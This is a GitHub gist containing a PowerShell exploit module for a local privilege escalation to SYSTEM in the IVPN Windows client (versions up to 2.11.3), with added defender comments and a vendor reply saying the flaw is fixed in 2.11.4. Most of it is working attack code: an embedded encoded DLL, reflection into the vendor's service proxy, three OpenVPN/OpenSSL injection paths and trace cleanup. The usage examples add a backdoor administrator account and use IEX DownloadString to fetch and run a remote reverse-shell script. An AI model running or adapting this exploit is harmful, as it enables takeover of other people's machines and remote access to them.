
@ykoster
Last active March 13, 2020 06:49
IVPN <= 2.11.3 exploit module to run commands with SYSTEM privileges
<#
Example usage:
Import-Module .\Invoke-ExploitIVPNLPE.psd1
Invoke-ExploitIVPNLPEConfigHijack "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
Invoke-ExploitIVPNLPEPkcs11 "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
Invoke-ExploitIVPNLPEConfigOption -Command "powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')"
#>
# Module manifest (.psd1) for the proof-of-concept module. The gist title scopes
# it to IVPN <= 2.11.3; the vendor comment on this page says the issue is fixed
# in Windows client v2.11.4, so upgrading is the remediation.
@{
RootModule = 'Invoke-ExploitIVPNLPE.psm1'
ModuleVersion = '1.0'
GUID = '73630188-3482-4d37-a546-b114adcbe223'
Author = 'Yorick Koster'
CompanyName = 'Securify B.V.'
Copyright = '(c) Yorick Koster. All rights reserved.'
Description = 'IVPN exploit module to run commands with SYSTEM privileges'
# The module loads the vendor's own IVPN.Core.dll from the default install path,
# so importing it requires the IVPN client to be installed at that location.
RequiredAssemblies = @("$env:ProgramFiles\IVPN Client\IVPN.Core.dll")
# Only the three per-method wrappers are exported; the shared worker function
# Invoke-ExploitIVPNLPE in the .psm1 is not listed here.
FunctionsToExport = @("Invoke-ExploitIVPNLPEConfigHijack", "Invoke-ExploitIVPNLPEPkcs11", "Invoke-ExploitIVPNLPEConfigOption")
}
# Selects which of the three code paths Invoke-ExploitIVPNLPE takes.
# The wrappers pass the numeric values (0/1/2) rather than the member names.
Enum ExploitMethod
{
# Drops openssl.cnf, lpe.dll and payload.bat under %SystemDrive%\etc\ssl.
ConfigHijack = 0
# Sets the open_vpn_extra_parameters preference to a pkcs11-providers line.
Pkcs11 = 1
# Sets the open_vpn_extra_parameters preference to a config line that points
# at a dropped openvpn.cfg containing an engine directive.
ConfigOption = 2
}
# Exported wrapper for the ConfigHijack path (ExploitMethod 0).
# Parameters:
#   Command - one or more command lines; all remaining arguments are collected
#             into the array and joined with newlines into a single string.
Function Invoke-ExploitIVPNLPEConfigHijack {
Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
# The literal 0 is bound to the [ExploitMethod] parameter (ConfigHijack).
Invoke-ExploitIVPNLPE -Command $($Command -join "`n") -ExploitMethod 0
}
# Exported wrapper for the Pkcs11 path (ExploitMethod 1).
# Parameters:
#   Command - one or more command lines; all remaining arguments are collected
#             into the array and joined with newlines into a single string.
Function Invoke-ExploitIVPNLPEPkcs11 {
Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
# The literal 1 is bound to the [ExploitMethod] parameter (Pkcs11).
Invoke-ExploitIVPNLPE -Command $($Command -join "`n") -ExploitMethod 1
}
# Exported wrapper for the ConfigOption path (ExploitMethod 2).
# Parameters:
#   Command - one or more command lines; all remaining arguments are collected
#             into the array and joined with newlines into a single string.
Function Invoke-ExploitIVPNLPEConfigOption {
Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
# The literal 2 is bound to the [ExploitMethod] parameter (ConfigOption).
Invoke-ExploitIVPNLPE -Command $($Command -join "`n") -ExploitMethod 2
}
# Shared worker behind the three exported wrappers (not exported itself).
# Parameters:
#   Command       - text written verbatim to payload.bat further down.
#   ExploitMethod - which of the three paths to take (see Enum ExploitMethod).
Function Invoke-ExploitIVPNLPE {
Param([Parameter(Position = 0, Mandatory = $true)] [string]$Command,
[Parameter(Position = 1, Mandatory = $true)] [ExploitMethod]$ExploitMethod)
# setup
# Creates the directory reported by [IVPN.Platform]::SettingsDirectory and copies
# the service's port.txt into it. Presumably IVPNClientProxy reads the port from
# there - not visible in this file, confirm against IVPN.Core.dll.
# Detection note: a read of "IVPN Client\etc\port.txt" by a process other than
# the IVPN client is an observable for this kind of protocol abuse.
New-Item -Type directory -Path $([IVPN.Platform]::SettingsDirectory) | Out-Null
Copy-Item -Path "$env:ProgramFiles\IVPN Client\etc\port.txt" -Destination "$([IVPN.Platform]::SettingsDirectory)\port.txt" | Out-Null
# embedded 32-bit DLL that runs payload.bat
$EncodedCompressedFile = "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"
# Base64-decode and gunzip the embedded blob into a fixed 13312-byte buffer.
# The bytes are only held in memory here; they are written to disk later.
$DeflatedStream = New-Object System.IO.Compression.GZipStream([System.IO.MemoryStream][System.Convert]::FromBase64String($EncodedCompressedFile), [System.IO.Compression.CompressionMode]::Decompress)
$dll = New-Object byte[] 13312
$DeflatedStream.Read($dll, 0, $dll.Length) | Out-Null
$DeflatedStream.Close() | Out-Null
# reflection stuff
# Looks up methods and fields of the vendor's client classes with
# NonPublic|Instance binding flags, so the script can build and send the same
# request objects the official client uses without going through its UI.
# NOTE(review): nothing in this file shows the service authenticating the
# caller - that is the trust boundary to verify on the service side.
$mConnectToService = [IVPN.IVPNClientProxy].GetMethod("ConnectToService", [Reflection.BindingFlags]"NonPublic, Instance")
$mSendRequest = [IVPN.IVPNClientProxy].GetMethod("SendRequest", [Reflection.BindingFlags]"NonPublic, Instance")
$fStreamReader = [IVPN.IVPNClientProxy].GetField("__StreamReader", "NonPublic, Instance")
$fStreamWriter = [IVPN.IVPNClientProxy].GetField("__StreamWriter", "NonPublic, Instance")
$fVersion = [IVPN.IVPNHelloRequest].GetField("Version", "NonPublic, Instance")
$fKey = [IVPN.IVPNSetPreferenceRequest].GetField("Key", "NonPublic, Instance")
$fValue = [IVPN.IVPNSetPreferenceRequest].GetField("Value", "NonPublic, Instance")
$fEntryVpnServer = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("EntryVpnServer", "NonPublic, Instance")
$fUsername = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("Username", "NonPublic, Instance")
$fPassword = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("Password", "NonPublic, Instance")
$fPort = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("Port", "NonPublic, Instance")
$fVpnType = [IVPN.IVPNConnectRequest].GetField("VpnType", "NonPublic, Instance")
$fOpenVpnParameters = [IVPN.IVPNConnectRequest].GetField("OpenVpnParameters", "NonPublic, Instance")
$fCurrentDns = [IVPN.IVPNConnectRequest].GetField("CurrentDns", "NonPublic, Instance")
# connect to service
# Instantiates the vendor proxy class and invokes its ConnectToService method,
# then marks the proxy as connected by setting ServiceConnected directly.
$client = New-Object IVPN.IVPNClientProxy
$mConnectToService.Invoke($client, $null)
$client.ServiceConnected = $true
# send hello request
# The hello carries a hard-coded client version string; the fixed sleep gives
# the service time to process it (no response is read or checked here).
$hello = New-Object IVPN.IVPNHelloRequest
$fVersion.SetValue($hello, "2.11.2.0")
$mSendRequest.Invoke($client, $hello)
Start-Sleep 1
# Stage files for the selected method.
# ConfigHijack: everything goes under %SystemDrive%\etc\ssl, including an
# openssl.cnf that declares a dynamic engine. Presumably the OpenSSL bundled
# with the client looks for its default config at this path - not shown in this
# file, confirm against the shipped binaries.
# Defender notes: creation of \etc\ssl\openssl.cnf or a DLL under \etc\ssl at
# the drive root by a standard user is a strong indicator; pre-creating the
# directory with restrictive ACLs and upgrading the client (the vendor comment
# on this page says fixed in v2.11.4) remove the path.
If($ExploitMethod -eq [ExploitMethod]::ConfigHijack) {
$targetfolder = "$env:SystemDrive\etc"
New-Item -Type directory -Path "$targetfolder\ssl" | Out-Null
Set-Content "$targetfolder\ssl\payload.bat" -Encoding ASCII $Command
Set-Content "$targetfolder\ssl\lpe.dll" -Encoding Byte $dll
Set-Content "$targetfolder\ssl\openssl.cnf" -Encoding ASCII "openssl_conf = init
[init]
engines = engines
[engines]
lpe = lpe
[lpe]
engine_id = lpe
dynamic_path = C:\\etc\\ssl\\lpe
default_algorithms = ALL
init = 1"
} Else {
# Pkcs11 / ConfigOption: files go into a GUID-named folder under %TEMP% and the
# DLL gets a GUID file name, so file names are not stable indicators for these
# two paths; payload.bat next to a freshly written DLL is the common pattern.
$targetfolder = "$env:TEMP\" + [System.Guid]::NewGuid()
$dllname = [System.Guid]::NewGuid().ToString()
New-Item -Type directory -Path "$targetfolder" | Out-Null
Set-Content "$targetfolder\payload.bat" -Encoding ASCII $Command
Set-Content "$targetfolder\$dllname.dll" -Encoding Byte $dll
If($ExploitMethod -eq [ExploitMethod]::Pkcs11) {
# Two OpenVPN option lines separated by a newline; backslashes in the path are doubled.
$extraparam = "pkcs11-providers $("$targetfolder\$dllname.dll".Replace("\", "\\"))`npkcs11-id $dllname"
} Else {
# Writes a one-line OpenVPN config with an engine directive and passes its path
# through a config option instead.
Set-Content "$targetfolder\openvpn.cfg" -Encoding ASCII "engine $("$targetfolder\$dllname".Replace("\", "\\"))"
$extraparam = "config $("$targetfolder\openvpn.cfg".Replace("\", "\\"))"
}
# set OpenVPN extra config parameters
# Sent only on this Else path (not for ConfigHijack). The value is free-form
# text supplied by the caller of the service API.
# Defender note: an open_vpn_extra_parameters value containing
# pkcs11-providers, engine or config with a user-writable path is the
# protocol-level indicator; a service should allow-list such options.
$setting = New-Object IVPN.IVPNSetPreferenceRequest
$fKey.SetValue($setting, "open_vpn_extra_parameters")
$fValue.SetValue($setting, $extraparam)
$mSendRequest.Invoke($client, $setting)
Start-Sleep 1
}
# launch OpenVPN
# Builds a connect request that points at 127.0.0.1 with placeholder
# gateway/country/credential values; the connection itself is not expected to
# succeed. Presumably the request makes the service start OpenVPN, which then
# reads the staged config/options - that step happens outside this file.
$server = New-Object IVPN.VpnProtocols.OpenVPN.OpenVPNVpnServer -Property @{IpAddresses = @("127.0.0.1"); GatewayId = "GatewayId"; CountryCode = "US"; Country = "United States"; City = "New York"}
$conparams = New-Object IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters
$fEntryVpnServer.SetValue($conparams, $server)
$fUsername.SetValue($conparams, "Username")
$fPassword.SetValue($conparams, "Password")
$fPort.SetValue($conparams, $(New-Object IVPN.VpnProtocols.DestinationPort(1337, 1)))
$conreq = New-Object IVPN.IVPNConnectRequest
$fVpnType.SetValue($conreq, [IVPN.VpnProtocols.VpnType]::OpenVPN)
$fOpenVpnParameters.SetValue($conreq, $conparams)
$fCurrentDns.SetValue($conreq, "8.8.8.8")
$mSendRequest.Invoke($client, $conreq)
# Fixed wait before tearing the connection down; no result is checked.
Start-Sleep 3
# disconnect vpn
$mSendRequest.Invoke($client, $(New-Object IVPN.IVPNDisconnectRequest))
Start-Sleep 1
# disconnect from service
# Closes the proxy's reader and writer obtained through the reflected fields.
$fStreamReader.GetValue($client).Close()
$fStreamWriter.GetValue($client).Close()
$client = $null
# clean up
# Caveat: both removals are recursive and forced. The first deletes the whole
# IVPN settings directory created during setup; the second deletes
# $targetfolder, which on the ConfigHijack path is %SystemDrive%\etc itself, not
# just the ssl subfolder. Forensics note: the staged files are removed, so
# file-creation telemetry matters more than a later disk sweep.
Remove-Item $([IVPN.Platform]::SettingsDirectory) -Force -Recurse
Remove-Item $targetfolder -Force -Recurse
}
@stenya

stenya commented Mar 13, 2020

Hi.
This local privilege escalation vulnerability has been fixed since Windows client v2.11.4.
